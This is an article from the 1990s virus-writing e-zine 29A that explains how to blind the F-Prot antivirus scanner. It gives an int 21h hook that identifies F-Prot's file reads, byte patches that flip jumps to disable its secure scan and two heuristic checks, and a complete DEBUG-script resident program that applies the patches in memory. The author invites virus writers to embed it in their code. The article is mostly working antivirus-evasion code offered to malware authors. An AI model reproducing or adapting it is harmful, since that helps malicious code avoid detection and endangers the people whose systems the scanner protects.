Copy Link
Add to Bookmark
Report
29A Issue 01 03 08
Chilling Fridrik
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
Blade Runner
The reason of writing this article is that i realised that i've never
seen how to fool F-Prot in any virus magazine... and as i like to be o-
riginal, i decided to have a look at it and try to do some modifications
in its code so it won't detect any virus... and i got it :)
And believe me that it's quite easy to do... just keep reading the arti-
cle and try it by yourself following the next steps :)
Ok, F-Prot, unlike TbScan, uses int 21h for opening, reading, and so on,
that is, for scanning files for any infection. When it reads from a file,
it does it holding the next values:
AX=3f00h
BX=0008h
CX=0800h
Since we know this, it's very easy for us to intercept this kind of calls
to the int 21h with something like this:
new_int_21h: cmp ax,3f00h
jne jump_back
cmp bx,8
jne jump_back
cmp cx,800h
je fprot_read
jump_back: db 0eah
old_int_21h dw ?,?
Once we know that it's a F-Prot read, we can start doing our work... the
unique things we must do for it to don't detect absolutely anything is to
bypass the secure scan and the two types of heuristic scanning it uses.
Let's see the way in which we can do this thingy :)
²²²²²²²²²²²²²²²²²²²²²²²²²²²
²² Secure method ²²
²²²²²²²²²²²²²²²²²²²²²²²²²²²
803FD0 CMP BYTE PTR [BX],D0
>7519 JNZ 0123 <<< change this for JZ
C41E502D LES BX,[2D50]
26 ES:
807F01CF CMP BYTE PTR [BX+01],CF
>750E JNZ 0123 <<< change this for JZ
9AF500C136 CALL 36C1:00F5
C706D64B0000 MOV WORD PTR [4BD6],0000
C706D44B0000 MOV WORD PTR [4BD4],0000
C41E502D LES BX,[2D50]
26 ES:
>803FFF CMP BYTE PTR [BX],4D <<< change 4dh for 0ffh
750B JNZ 0121
C41E502D LES BX,[2D50]
26 ES:
807F015A CMP BYTE PTR [BX+01],5A
742A JZ 014B
²²²²²²²²²²²²²²²²²²²²²²²²²²²
²² First heuristic ²²
²²²²²²²²²²²²²²²²²²²²²²²²²²²
9A2605AF1F CALL 1FAF:0526
0BC0 OR AX,AX
>740E JZ 0117 <<< change this for jnz
FF36E43D PUSH [3DE4]
9A0000794A CALL 4A79:0000
²²²²²²²²²²²²²²²²²²²²²²²²²²²²
²² Second heuristic ²²
²²²²²²²²²²²²²²²²²²²²²²²²²²²²
833EBF5500 CMP WORD PTR [55BF],+00
>7402 JZ 0109 <<< change this for jnz
EB32 JMP 013B
81FE8713 CMP SI,1387
7524 JNZ 0133
And that's all, folks... since this five bytes have been changed, F-Prot
will *NOT* detect any virus. As a last thing i'll include the complete
routine, though it's a trivial thing, so you can implement it in your re-
tro code; as i always use debug for coding, i think you'll have to adapt
it, but anyway... :)
And don't ask me why do i always use debug for coding instead the tra-
ditional .ASM text file and TASM or A86... :)
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
na-fp.com
a100
jmp 0174
a110
cmp ah,3f
jz 0117
jmp 0125
cmp bx,+08
jz 011e
jmp 0125
cmp cx,0800
jz 0130
nop
cs:
jmp far [0103]
a130
push ax
push bx
push cx
push dx
push ds
mov ax,ss
sub ax,3295
mov ds,ax
mov bx,01a2
mov cl,f0
mov [bx],cl
mov cl,74
mov bx,042b
mov [bx],cl
mov bx,0420
mov [bx],cl
mov ax,ss
sub ax,3521
mov ds,ax
mov bx,03e8
mov cl,75
mov [bx],cl
mov ax,ss
sub ax,17c7
mov ds,ax
mov bx,0347
mov [bx],cl
pop ds
pop dx
pop cx
pop bx
pop ax
cs:
jmp far [0103]
a174
mov dx,197
mov ah,9
int 21
mov ax,3521
int 21
mov [0103],bx
mov [0105],es
mov dx,0110
mov ax,2521
int 21
mov dx,0174
int 27
a197
db "F-Prot won't detect any virus","$"
db " (c) Blade Runner/29A, 1996 ","$"
rcx
be
w
q
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Blade Runner/29A
Los Angeles, 2019
